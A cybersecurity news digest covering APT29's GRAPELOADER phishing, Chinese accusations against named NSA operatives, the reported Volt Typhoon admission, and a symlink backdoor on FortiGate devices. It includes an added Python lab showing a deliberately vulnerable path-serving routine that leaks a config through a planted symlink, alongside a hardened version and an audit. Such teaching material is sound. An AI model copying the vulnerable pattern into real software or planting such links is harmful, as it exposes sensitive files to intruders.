- Security Risk Advisors: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
- ciso2ciso.com: Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware – Source: securityaffairs.com
- ciso2ciso.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
- Talkback Resources: Russia-linked group APT29 used a phishing campaign with fake wine tasting invitations to target European embassies and Ministries of Foreign Affairs, deploying GrapeLoader and WineLoader malware to gather sensitive information and conduct cyber spying operations.
- Blog: Russian state-sponsored hacking group APT29, also known as Cozy Bear or Midnight Blizzard, has launched a sophisticated phishing campaign targeting European diplomatic entities. The attackers are using deceptive emails that mimic invitations to wine-tasting events, enticing recipients to download a malicious ZIP file named "wine.zip."
Dissent@DataBreaches.Net
//
China has accused the United States National Security Agency (NSA) of launching "advanced" cyberattacks during the Asian Winter Games in February 2025, targeting essential industries. Police in the northeastern city of Harbin have placed three alleged NSA agents on a wanted list, accusing them of attacking the Winter Games' event information system and key information infrastructure in Heilongjiang province, where Harbin is located. The named NSA agents are Katheryn A. Wilson, Robert J. Snelling, and Stephen W. Johnson, all allegedly members of the NSA's Tailored Access Operations (TAO) offensive cyber unit.
China Daily reports the TAO targeted systems used for registration, timekeeping, and competition entry at the Games, systems which store "vast amounts of sensitive personal data." The publication also stated the TAO appeared to be trying to implant backdoors and used multiple front organizations to purchase servers in Europe and Asia to conceal its tracks and acquire the tools used to breach Chinese systems. A joint report from China's computer emergency response centers (CERTs) stated that over 270,000 attacks on the Asian Winter Games were detected, with 170,000 allegedly launched by the US.
Chinese foreign ministry spokesperson Lin Jian condemned the alleged cyber activity, urging the U.S. to take a responsible attitude on cybersecurity issues and stop any attacks and "groundless vilification against China." Xinhua reported the agents repeatedly carried out cyber attacks on China’s critical information infrastructure and participated in cyber attacks on Huawei and other enterprises. Chinese law enforcement agencies are seeking information that could lead to the arrest of the three NSA operatives, though rewards were not disclosed.
References :
- The Register - Security: China names alleged US snoops over Asian Winter Games attacks
- www.cybersecurity-insiders.com: China accuses US of launching advanced Cyber Attacks on its infrastructure
- CyberScoop: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
- DataBreaches.Net: China accuses US of launching ‘advanced’ cyberattacks, names alleged NSA agents
- www.scworld.com: China's allegation that NSA hacked Asian Winter Games draws suspicion
- cyberscoop.com: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
- PCMag UK security: Police in the Chinese city of Harbin say three NSA operatives disrupted the 2025 Asian Winter Games and hacked Huawei.
- : China accused the United States National Security Agency (NSA) on Tuesday of launching "advanced" cyberattacks during the Asian Winter Games in February, targeting essential industries.
- Metacurity: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
- www.metacurity.com: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
- www.dailymail.co.uk: China accuses US of launching 'advanced' cyberattacks, names alleged NSA agents
- sysdig.com: UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell
- aboutdfir.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure
@www.wsj.com
//
China has reportedly acknowledged its role in the cyberattacks on U.S. critical infrastructure attributed to the Volt Typhoon campaign. According to The Wall Street Journal, which first reported the story, the admission came during a secret meeting with U.S. officials in Geneva in December 2024. U.S. officials read Volt Typhoon's activity, which involved infiltrating the systems of multiple industries through zero-day exploits and other advanced tactics, as an attempt to deter U.S. support for Taiwan. The meeting also covered the cyberespionage of the Chinese state-backed Salt Typhoon group against U.S. telecommunications firms, which compromised the communications of U.S. officials.
These attacks fit a broader pattern of Chinese state-backed hackers increasing their activity against infrastructure in the U.S., Europe and the Asia-Pacific region. Recent intelligence indicates that groups such as Volt Typhoon and Salt Typhoon have infiltrated power grids, telecommunications networks and transportation systems. Their apparent goal is prepositioning: keeping quiet, persistent access so that disruption or coercive retaliation is available during a conflict or crisis, an approach the cited analysis describes as planting dormant "logic bombs" while minimizing the risk of detection.
The intensified activity is viewed as one component of China's cyber-enabled irregular warfare strategy. The analysis by IT security professional Simone Kraus cites a power grid failure in Taiwan that it attributes to a Volt Typhoon logic bomb, along with similar reports from European infrastructure. The sophistication lies less in novel malware than in "Living Off the Land" tradecraft, using built-in tools and valid accounts so that activity blends into normal administration, combined with proxy groups and disinformation to pursue strategic objectives without triggering a conventional military response. The concern is the real-world consequences if such access were used against critical infrastructure.
References :
- Sam Bent: In a closed-door Geneva summit, Chinese officials admitted—albeit indirectly—to orchestrating Volt Typhoon cyberattacks on US infrastructure. The move signals escalating covert conflict over Taiwan and exposes the US grid’s vulnerability to prolonged foreign infiltration.
- DataBreaches.Net: Chinese officials acknowledged in a secret December meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
- www.metacurity.com: China acknowledged US cyberattacks at a secret meeting, report
- WIRED: China Secretly (and Weirdly) Admits It Hacked US Infrastructure
- Risky Business Media: China privately admits to hacking American critical infrastructure, the US Treasury was compromised by password spraying, America will sign a global spyware agreement after all, and a Chinese APT is abusing the Windows Sandbox to hide its malware.
- securityaffairs.com: China admitted its role in Volt Typhoon cyberattacks on U.S. infrastructure, WSJ reports.
- The Register - Security: China reportedly admitted directing cyberattacks on US infrastructure at a meeting with their American counterparts, according to The Wall Street Journal.…
- Schneier on Security: China Sort of Admits to Being Behind Volt Typhoon
- oodaloop.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure: Report
- www.scworld.com: US critical infrastructure attacks reportedly acknowledged by China
- OODAloop: In a secret meeting that took place late last year between Chinese and American officials, the former confirmed that China had conducted cyberattacks against US infrastructure as part of the campaign known as Volt Typhoon, according to The Wall Street Journal.
- cybersecuritynews.com: Chinese Hackers Attacking Critical Infrastructure to Sabotage Networks
- Metacurity: China acknowledged US cyberattacks at a secret meeting, report
- ciso2ciso.com: China Sort of Admits to Being Behind Volt Typhoon – Source: www.schneier.com
- WIRED: Brass Typhoon: The Chinese Hacking Group Lurking in the Shadows
@www.bleepingcomputer.com
//
Over 16,000 internet-exposed Fortinet devices have been found carrying a symlink backdoor that gives attackers read-only access to sensitive files, according to scans by The Shadowserver Foundation. The backdoor is not a new entry vector: attackers who had already compromised a FortiGate through known SSL-VPN vulnerabilities planted a symbolic link in the folder that serves SSL-VPN language files, pointing from the user filesystem back to the root filesystem. Because the web interface served whatever that folder contained, the link let the intruders read files on the root filesystem, including the device configuration, and it kept working after the original vulnerabilities were patched.
Researchers describe this as a new post-exploitation technique rather than a new flaw in FortiOS. A fix for the original bug (the page cites CVE-2023-27997) closes the way in, but it does not remove a symlink that is already sitting on the device, because the link lives in the user-writable filesystem, which earlier firmware upgrades left untouched, and it survives reboots. The result is that an actor with prior access retains read-only visibility into the device even after the firmware is updated; the patched vulnerability itself is not re-opened. Devices that never had SSL-VPN enabled are not affected, since the served folder is what exposes the link.
Fortinet responded with an internal investigation, coordination with third-party experts, and an AV/IPS signature that detects and removes the symbolic link automatically. Fixed builds were issued across supported branches: FortiOS 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These releases remove the planted symlink and change the SSL-VPN user interface so that it no longer serves such links. Organizations are urged to upgrade to one of these versions, and, because the link may already have been used to read the configuration, to treat affected devices as compromised: follow Fortinet's published compromise-response steps, reset credentials and keys stored in the configuration, and review the device's configuration for unauthorized changes.
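The following is an added example, not Fortinet's code and not taken from any of the cited articles. It reproduces the vulnerability class described above in a throwaway directory: a web tier serves one folder, an attacker with prior write access drops a symlink there that points at the filesystem root, and a naive path-serving routine happily follows it. The hardened routine resolves the path first and refuses anything whose real location is outside the served folder, and a small audit walker lists planted links the way a signature or post-compromise check would. All directory names (`root`, `www/lang`, `config.conf`) are constructed stand-ins, not FortiOS paths.

```python
"""Symlink escape from a web-served folder: vulnerable vs. hardened serving,
plus an audit that finds links escaping the folder.  Added example with a
constructed directory layout; nothing here is vendor code."""
import os
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple


def build_lab() -> Tuple[Path, Path]:
    """Construct the lab: a 'root' filesystem holding a secret config and a
    'lang' folder that the web tier serves.  The attacker, already on the
    box, plants a symlink inside lang/ that points back at root/.
    Layout and file names are constructed for the example."""
    base = Path(tempfile.mkdtemp(prefix="symlink-lab-"))
    root = base / "root"
    lang = root / "www" / "lang"
    lang.mkdir(parents=True)
    (root / "config.conf").write_text("set admin-password SECRET\n")
    (lang / "en.json").write_text('{"login": "Login"}\n')
    # Persistence artifact: served folder -> filesystem root.
    os.symlink(root, lang / "x")
    return root, lang


def serve_naive(lang: Path, request_path: str) -> Optional[str]:
    """Vulnerable pattern: join the request onto the served folder and read
    whatever is there, following symlinks.  A request for /x/config.conf
    walks through the planted link and returns the secret."""
    target = lang / request_path.lstrip("/")
    if target.is_file():
        return target.read_text()
    return None


def serve_hardened(lang: Path, request_path: str) -> Optional[str]:
    """Fixed pattern: resolve symlinks, then require the real path to sit
    under the real served folder.  The planted link resolves to root/,
    which is outside lang/, so the request is refused."""
    served_root = lang.resolve()
    target = (lang / request_path.lstrip("/")).resolve()
    if served_root not in target.parents:
        return None
    if target.is_file():
        return target.read_text()
    return None


def find_escaping_symlinks(served_dir: Path) -> List[Tuple[Path, Path]]:
    """Audit: list every symlink under served_dir whose resolved target is
    outside served_dir.  os.walk with followlinks=False reports symlinked
    directories without descending into them, so a link to '/' does not
    turn the walk into a scan of the whole filesystem."""
    served_root = served_dir.resolve()
    hits: List[Tuple[Path, Path]] = []
    for dirpath, dirnames, filenames in os.walk(served_dir, followlinks=False):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            real = p.resolve()
            if real != served_root and served_root not in real.parents:
                hits.append((p, real))
    return hits


if __name__ == "__main__":
    root, lang = build_lab()
    print("naive   :", serve_naive(lang, "/x/config.conf"))
    print("hardened:", serve_hardened(lang, "/x/config.conf"))
    for link, real in find_escaping_symlinks(lang):
        print("escaping symlink:", link, "->", real)
```

The audit walker is the part worth keeping for your own appliances and web roots: run it against any directory a service exposes to unauthenticated clients, and treat an escaping link as evidence of prior compromise, not as a misconfiguration to quietly delete.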
Recommended read:
References :
- www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
- thehackernews.com: Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
- community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
- BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
- BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
- Help Net Security: FortiOS, FortiGate vulnerabilities
- bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
- www.bleepingcomputer.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
- bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
- www.scworld.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
- www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
- The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
- MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
- securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
- ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access – Source: hackread.com
- Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
- BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
- bsky.app: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
- www.bleepingcomputer.com: Over 16,000 Fortinet devices compromised with symlink backdoor
- The DefendOps Diaries: Fortinet Devices Under Siege: Understanding the Symlink Backdoor Threat
- www.cybersecuritydive.com: Over 14K Fortinet devices compromised via new attack method